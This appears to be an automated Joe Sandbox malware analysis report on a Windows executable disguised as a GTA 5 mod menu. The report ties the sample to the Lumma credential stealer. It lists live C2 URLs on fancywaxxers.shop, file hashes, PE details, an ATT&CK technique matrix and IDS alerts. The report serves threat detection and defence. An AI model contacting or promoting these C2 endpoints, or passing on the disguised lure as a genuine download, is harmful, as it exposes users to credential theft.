Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GTA-5-Mod-Menu-2025.exe	32%	ReversingLabs	Win32.Trojan.Generic
GTA-5-Mod-Menu-2025.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://fancywaxxers.shop/apie	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiH$0?	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api9v&?	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apizv	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/api_seed_date	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.96.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://fancywaxxers.shop/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apie	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apiH$0?	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/api9v&?	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/api_seed_date	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2146796814.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147024672.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2147289570.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160705276.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136057544.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2160514504.0000000005CAD000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2137052378.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2196493094.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2191993224.0000000003597000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338101784.000000000359A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2108339651.0000000003549000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2136299155.0000000005CAA000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2135952331.0000000005CA9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148286158.0000000005DC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122876508.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122957911.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2122742884.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148144892.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2148590328.00000000035AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop:443/api	GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202494460.0000000003593000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163534118.000000000358A000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163644573.0000000003594000.00000004.00000020.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2163600305.0000000003593000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/apizv	GTA-5-Mod-Menu-2025.exe, 00000004.00000002.3338561708.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2202624391.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp, GTA-5-Mod-Menu-2025.exe, 00000004.00000003.2830428069.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.96.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582531
Start date and time:	2024-12-30 20:40:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GTA-5-Mod-Menu-2025.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/0@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 47 Number of non-executed functions: 125
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target GTA-5-Mod-Menu-2025.exe, PID 64 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: GTA-5-Mod-Menu-2025.exe

Simulations

Behavior and APIs

Time	Type	Description
14:40:58	API Interceptor	8x Sleep call for process: GTA-5-Mod-Menu-2025.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.96.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
104.21.96.1	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fancywaxxers.shop	random.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	R3nz_Loader.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.80.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.16.1
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.154.95
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.64.143
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	#Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.0.151
	https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188	Get hash	malicious	KnowBe4	Browse	104.17.25.14
	random.exe	Get hash	malicious	LummaC	Browse	104.21.64.143

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	hoEtvOOrYH.exe	Get hash	malicious	SmokeLoader	Browse	104.21.96.1
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.96.1
	setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	SharkHack.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.96.1
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	#Setup.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	random.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	UmotQ1qjLq.exe	Get hash	malicious	LummaC	Browse	104.21.96.1

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.822135248890638
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	GTA-5-Mod-Menu-2025.exe
File size:	820'736 bytes
MD5:	97098e0b103acdf642b87d2b96155992
SHA1:	e6ffd40917dcb773e6cd7a9dba339cf967498c8a
SHA256:	cec32b81cc4dfb722928389bea59758bfe275da7b36732512d887a845053e191
SHA512:	87cb9a9394ef39a3728933ba21a81089f1982c5f7a563104bbb64c984b57bbc0d0945fe514f71b2f37df526606d22ea6566be9ab8e18d1e25234052f05d68744
SSDEEP:	12288:ou4dP5M4Q2MmbFsgMH+GsGde1vy0xt4K7wam97DFsgMH+GsGde1vy0xt4K7wam9x:t4dPpQPmPMH4Koqq697nMH4Koqq697N
TLSH:	E4050252B650C0B2C9B3117255F5DBB6493EBA214F317ECF67980FAE4E311E15A30B2A
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....rg.................H........................@.......................................@.....................................(..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40a2a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6772AADA [Mon Dec 30 14:14:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d6bfc0ff235c28cc21f6045af30834e6

Entrypoint Preview

Instruction
call 00007FF42967A32Ah
jmp 00007FF42967A18Dh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FF42967A326h
test esi, ecx
jne 00007FF42967A348h
call 00007FF42967A351h
mov ecx, eax
cmp ecx, edi
jne 00007FF42967A329h
mov ecx, BB40E64Fh
jmp 00007FF42967A330h
test esi, ecx
jne 00007FF42967A32Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E8C8h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E884h]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E880h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E910h]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431AB8h
call dword ptr [0042E8E8h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e6ac	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x35000	0x1b80	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a9a8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26e40	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e820	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2479a	0x24800	e99bb4e274380b09613559d3b1a664fb	False	0.554781142979452	data	6.559742159760055	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9eb4	0xa000	3f1d7f6413abea491661acb746eefebf	False	0.428271484375	DOS executable (COM)	4.91372050063646	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x2280	0x1600	112d0c9e43893ae5b7f96d23807996ac	False	0.39506392045454547	data	4.581141173428789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x33000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0xe8	0x200	03d6bf5d1e31277fc8fb90374111d794	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x35000	0x1b80	0x1c00	6e4c901089600f702531dbe2643a65b6	False	0.7770647321428571	data	6.526735403310053	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x37000	0x4b000	0x4b000	935c377743f9d6031645984e06824d03	False	1.0003287760416666	data	7.999502416028787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.BSS	0x82000	0x4b000	0x4b000	935c377743f9d6031645984e06824d03	False	1.0003287760416666	data	7.999502416028787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x34060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeConsole, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T20:40:58.501835+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49705	104.21.96.1	443	TCP
2024-12-30T20:40:58.976794+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49705	104.21.96.1	443	TCP
2024-12-30T20:40:58.976794+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49705	104.21.96.1	443	TCP
2024-12-30T20:40:59.471486+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49706	104.21.96.1	443	TCP
2024-12-30T20:41:00.222152+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49706	104.21.96.1	443	TCP
2024-12-30T20:41:00.222152+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49706	104.21.96.1	443	TCP
2024-12-30T20:41:01.036591+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49707	104.21.96.1	443	TCP
2024-12-30T20:41:02.335243+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49708	104.21.96.1	443	TCP
